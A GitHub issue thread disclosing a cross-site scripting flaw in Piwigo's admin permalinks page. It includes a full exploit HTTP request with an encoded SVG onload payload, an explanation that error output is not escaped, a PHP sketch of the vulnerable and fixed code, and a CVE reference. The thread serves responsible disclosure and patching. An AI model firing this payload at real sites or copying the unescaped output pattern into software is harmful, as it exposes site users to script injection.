XSS in /admin.php?page=permalinks #1158

Open
matuhn opened this issue Feb 12, 2020 · 3 comments

matuhn commented Feb 12, 2020

Hi team!

I found an XSS in /admin.php?page=permalinks

Exploit Request:

```
POST /piwigo/piwigo/admin.php?page=permalinks HTTP/1.1
Host: 192.168.10.138
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 138
Origin: http://192.168.10.138
Connection: close
Referer: http://192.168.10.138/piwigo/piwigo/admin.php?page=permalinks
Cookie: pwg_id=ragm92nc6a3rr532fi0h9h6f21
Upgrade-Insecure-Requests: 1

cat_id=3&permalink=%3Csvg%2Fonload%3Dalert%28document.domain%29%3E&save=on&set_permalink=Submit&pwg_token=2048f9dd482aaca003e193045fd4f763
```

PoC:


matuhn commented Feb 12, 2020

@plegall please check this!


cpol0 commented Apr 19, 2021

Hi,
the issue is located in the set_cat_permalink function. The special "xss permalink" is detected as a bad permalink and so the function returns immediately with an error message.
It is exactly at this point that the XSS occurs: the $permalink variable is displayed with an error message without escaping, which leads to the XSS.

A simple html_entities fixes the issue. PR coming soon.

cpol0 pushed a commit to cpol0/Piwigo that referenced this issue Apr 19, 2021
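
The failure mode described in the comment above, as an added PHP sketch that is not Piwigo's code or the fix from the referenced commit: a value that validation rejects is still reflected through the error message. The validation rule, function names and message text are assumptions; the sample input is the `permalink` value from the request in this issue.

```php
<?php
// Added illustration; not Piwigo's set_cat_permalink(). All names are hypothetical.

// Assumed validation rule for this sketch: letters, digits, '-', '_' and '/' only.
function is_valid_permalink(string $permalink): bool
{
    return preg_match('#\A[A-Za-z0-9_/-]+\z#', $permalink) === 1;
}

// Before: the rejected value is concatenated into the HTML error message as-is.
function permalink_error_unescaped(string $permalink): ?string
{
    if (is_valid_permalink($permalink)) {
        return null;
    }
    return 'The permalink "' . $permalink . '" is not valid.';
}

// After: the rejected value is HTML-encoded where it enters markup.
function permalink_error_escaped(string $permalink): ?string
{
    if (is_valid_permalink($permalink)) {
        return null;
    }
    $safe = htmlspecialchars($permalink, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return 'The permalink "' . $safe . '" is not valid.';
}

// Sample input: the URL-decoded `permalink` parameter from the request in this issue.
$submitted = urldecode('%3Csvg%2Fonload%3Dalert%28document.domain%29%3E');

$before = permalink_error_unescaped($submitted);
$after  = permalink_error_escaped($submitted);

// Validation rejects the value on both paths, so both return an error message.
// Only the unescaped message still carries a tag the browser would parse.
assert(strpos($before, '<svg') !== false);
assert(strpos($after, '<') === false);
assert(strpos($after, '&lt;svg/onload=alert(document.domain)&gt;') !== false);

// A value that passes validation produces no error message at all.
assert(permalink_error_escaped('holidays/2020') === null);

echo $before, PHP_EOL;
echo $after, PHP_EOL;
```

Rejecting the input is not enough on its own: every path that echoes the rejected value back, error messages included, needs output encoding for the HTML context.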

fgeek commented Dec 7, 2021

https://nvd.nist.gov/vuln/detail/CVE-2020-22150 has been assigned for this issue.
